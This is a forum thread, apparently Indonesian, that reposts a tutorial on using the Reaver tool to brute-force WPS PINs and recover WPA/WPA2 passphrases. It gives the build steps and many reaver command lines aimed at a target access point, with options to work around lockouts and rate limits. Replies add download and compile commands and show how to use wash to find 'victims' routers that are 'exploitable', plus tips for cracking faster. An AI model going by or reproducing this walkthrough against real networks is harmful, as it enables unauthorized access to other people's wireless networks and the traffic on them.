Reaver-wps WPA/WPA2 Cracking Tutorial

[core]

Reaver performs a brute force attack against an access point's WiFi Protected Setup pin number. Once the WPS pin is found, the WPA PSK can be recovered and alternately the AP's wireless settings can be reconfigured. While Reaver does not support reconfiguring the AP, this can be accomplished with wpa_supplicant once the WPS pin is known.



Reaver performs a brute force attack against the AP, attempting every possible combination in order to guess the AP's 8 digit pin number. Since the pin numbers are all numeric, there are 10^8 (100,000,000) possible values for any given pin number. However, because the last digit of the pin is a checksum value which can be calculated based on the previous 7 digits, that key space is reduced to 10^7 (10,000,000) possible values.

The key space is reduced even further due to the fact that the WPS authentication protocol cuts the pin in half and validates each half individually. That means that there are 10^4 (10,000) possible values for the first half of the pin and 10^3 (1,000) possible values for the second half of the pin, with the last digit of the pin being a checksum.

Reaver brute forces the first half of the pin and then the second half of the pin, meaning that the entire key space for the WPS pin number can be exhausted in 11,000 attempts. The speed at which Reaver can test pin numbers is entirely limited by the speed at which the AP can process WPS requests. Some APs are fast enough that one pin can be tested every second; others are slower and only allow one pin every ten seconds. Statistically, it will only take half of that time in order to guess the correct pin number.

Reaver WPA Cracking Tutorial
Download:
Reaver is only supported on the Linux platform, requires the libpcap and libsqlite3 libraries, and can be built and installed by running:

$ ./configure
$ make
# make install
To remove everything installed/created by Reaver:
# make distclean

USAGE
Usually, the only required arguments to Reaver are the interface name and the BSSID of the target AP:

# reaver -i mon0 -b 00:01:02:03:04:05

The channel and SSID (provided that the SSID is not cloaked) of the target AP will be automatically identified by Reaver, unless explicitly specified on the command line:

# reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys

By default, if the AP switches channels, Reaver will also change its channel accordingly. However, this feature may be disabled by fixing the interface's channel:

# reaver -i mon0 -b 00:01:02:03:04:05 --fixed

The default receive timeout period is 5 seconds. This timeout period can be set manually if necessary (minimum timeout period is 1 second):

# reaver -i mon0 -b 00:01:02:03:04:05 -t 2

The default delay period between pin attempts is 1 second. This value can be increased or decreased to any non-negative integer value. A value of zero means no delay:

# reaver -i mon0 -b 00:01:02:03:04:05 -d 0

Some APs will temporarily lock their WPS state, typically for five minutes or less, when "suspicious" activity is detected. By default when a locked state is detected, Reaver will check the state every 315 seconds (5 minutes and 15 seconds) and not continue brute forcing pins until the WPS state is unlocked. This check can be increased or decreased to any non-negative integer value:

# reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250

For additional output, the verbose option may be provided. Providing the verbose option twice will increase verbosity and display each pin number as it is attempted:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv

The default timeout period for receiving the M5 and M7 WPS response messages is .1 seconds. This timeout period can be set manually if necessary (max timeout period is 1 second):

# reaver -i mon0 -b 00:01:02:03:04:05 -T .5

Some poor WPS implementations will drop a connection on the floor when an invalid pin is supplied instead of responding with a NACK message as the specs dictate. To account for this, if an M5/M7 timeout is reached, it is treated the same as a NACK by default. However, if it is known that the target AP sends NACKS (most do), this feature can be disabled to ensure better reliability. This option is largely useless as Reaver will auto-detect if an AP properly responds with NACKs or not:

# reaver -i mon0 -b 00:01:02:03:04:05 --nack

While most APs don't care, sending an EAP FAIL message to close out a WPS session is sometimes necessary. By default this feature is disabled, but can be enabled for those APs that need it:

# reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate

When 10 consecutive unexpected WPS errors are encountered, a warning message will be displayed. Since this may be a sign that the AP is rate limiting pin attempts or simply being overloaded, a sleep can be put in place that will occur whenever these warning messages appear:

# reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360

download :http://code.google.com/p/reaver-wps/
sumber : http://www.ehacking.net/2012/01/reaver-w...orial.html

[eperwiras]

ini harus pake linux atau BT ?
ndak ngerti bacanya.. maklum bukan orang luar... orang indonesia asli

[Fauzi Topan]

(02-24-2012 03:47 PM)eperwiras Wrote:  ini harus pake linux atau BT ?
ndak ngerti bacanya.. maklum bukan orang luar... orang indonesia asli

pakai linux bang sepertinya, tidak harus menggunakan BT.
download, extract, lalu compile seperti biasa

Code:

wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
tar xvzf reaver-1.4.tar.gz
cd reaver-1.4
./configure
make
sudo make install

[eval]

to test if the clients (victims) u have to be inside the folder of reaver

cd /reaver-1.4/src
and after that
./wash -i mon0 -C (this command will show up the victims routers that are exploitable on that security)
the -C command works for almost all adapters wich dosent receive good packers so will ingore some SHI^^

Tip: The best thing to work reaver very fast and really good is to be all most near to the router!

[darkdante]

(03-09-2012 02:26 AM)eval Wrote:  to test if the clients (victims) u have to be inside the folder of reaver

cd /reaver-1.4/src
and after that
./wash -i mon0 -C (this command will show up the victims routers that are exploitable on that security)
the -C command works for almost all adapters wich dosent receive good packers so will ingore some SHI^^

Tip: The best thing to work reaver very fast and really good is to be all most near to the router!

welcome Eval !

regards
ev1lut10n (jasapluscom)